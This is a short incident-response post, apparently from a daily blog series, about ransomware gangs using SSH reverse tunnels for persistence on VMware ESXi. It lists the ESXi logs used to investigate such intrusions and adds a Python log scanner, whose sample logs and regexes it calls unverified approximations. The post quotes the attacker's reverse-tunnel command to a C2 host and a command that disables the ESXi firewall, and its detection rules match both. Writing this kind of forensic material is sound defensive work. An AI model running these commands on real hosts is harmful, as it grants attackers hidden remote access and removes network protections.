030. Ransomware Gangs Use SSH Tunneling for Stealthy Persistence in VMware ESXi infrastructure
Hello everyone! Recently Sygnia shared their insights on how ransomware gangs abuse SSH for stealthy persistence and how to investigate such activity.
To create a tunnel, the threat actors may use SSH binary:
ssh -fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>
From an incident response and forensics point of view, the following log files are the most interesting:
- /var/log/shell.log
- /var/log/hostd.log
- /var/log/auth.log
- /var/log/vobd.log
Analysis of these files lets you uncover lots of interesting events, for example enabling SSH access, disabling firewall rules, SSH authentication into ESXi, etc.
So, if you deal with modern ransomware attacks, being familiar with ESXi forensics is a must!
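As an added example (not code from the post or from Sygnia), here is a small scanner that runs detection rules over the four log files named above and builds a cross-file timeline: SSH being enabled (hostd.log), firewall rule sets disabled (hostd.log), the accepted SSH login (auth.log), and the firewall disable plus the reverse SSH tunnel command typed in the ESXi shell (shell.log). The sample log lines, the rule names and the regexes are constructed approximations of ESXi log formats and are assumptions, not verified against a real host.

```python
"""Scan ESXi log files for SSH-tunnel persistence indicators and build a timeline."""
import re
from dataclasses import dataclass

# Constructed sample lines approximating ESXi log formats; timestamps, PIDs,
# users and IPs are made up for this example (not from the post).
SAMPLE_LOGS = {
    "/var/log/hostd.log": [
        "2025-01-20T10:01:02Z info hostd[2099] [Originator@6876 sub=Vimsvc.ha-eventmgr] "
        "Event 501 : SSH access has been enabled.",
        "2025-01-20T10:01:10Z info hostd[2099] [Originator@6876 sub=Vimsvc.ha-eventmgr] "
        "Event 502 : Firewall configuration has changed. Operation 'disable' for rule set sshServer succeeded.",
    ],
    "/var/log/auth.log": [
        "2025-01-20T10:02:30Z sshd[10442]: Accepted keyboard-interactive/pam for root "
        "from 198.51.100.7 port 50210 ssh2",
    ],
    "/var/log/shell.log": [
        "2025-01-20T10:03:15Z shell[10450]: [root]: esxcli network firewall set --enabled false",
        "2025-01-20T10:03:40Z shell[10450]: [root]: ssh -fN -R 127.0.0.1:1080 user@203.0.113.9",
        "2025-01-20T10:04:00Z shell[10450]: [root]: esxcli vm process list",  # benign, must not match
    ],
    "/var/log/vobd.log": [],
}

# Leading ISO-8601 timestamp shared by the ESXi log formats assumed here.
TS_RE = re.compile(r"^(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z)")

# Hypothetical detection rules: (rule name, log file the rule applies to, pattern).
# Capture groups become the finding's detail (user, IP, rule set, C2 host).
RULES = [
    ("ssh_enabled", "/var/log/hostd.log",
     re.compile(r"SSH access has been enabled")),
    ("firewall_ruleset_disabled", "/var/log/hostd.log",
     re.compile(r"Firewall configuration has changed\. Operation 'disable' for rule set (\S+)")),
    ("ssh_login", "/var/log/auth.log",
     re.compile(r"Accepted \S+ for (\S+) from (\S+) port")),
    ("firewall_disabled", "/var/log/shell.log",
     re.compile(r"esxcli network firewall set --enabled false")),
    # ssh with a remote-forward (-R, possibly combined as -fNR) to <user>@<host>
    ("ssh_reverse_tunnel", "/var/log/shell.log",
     re.compile(r"\bssh\b.*\s-\w*R\s+\S+\s+(\S+)@(\S+)")),
]


@dataclass
class Finding:
    timestamp: str
    source: str
    rule: str
    detail: str


def scan(logs):
    """Apply every rule to the lines of the file it targets; return all matches."""
    findings = []
    for rule, path, pattern in RULES:
        for line in logs.get(path, []):
            m = pattern.search(line)
            if not m:
                continue
            ts = TS_RE.match(line)
            findings.append(Finding(ts.group(1) if ts else "", path, rule,
                                    " ".join(m.groups())))
    return findings


def timeline(logs):
    """Findings from all files merged into one chronologically ordered list."""
    return sorted(scan(logs), key=lambda f: f.timestamp)


if __name__ == "__main__":
    for f in timeline(SAMPLE_LOGS):
        print(f"{f.timestamp}  {f.source:<22} {f.rule:<26} {f.detail}")
```

On a real host the same rules would be run over the actual files (or over a VMware support bundle); the value of merging the files is that the SSH-enable event, the firewall change and the tunnel command appear minutes apart in different logs and only form a coherent intrusion story when ordered together.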
See you tomorrow!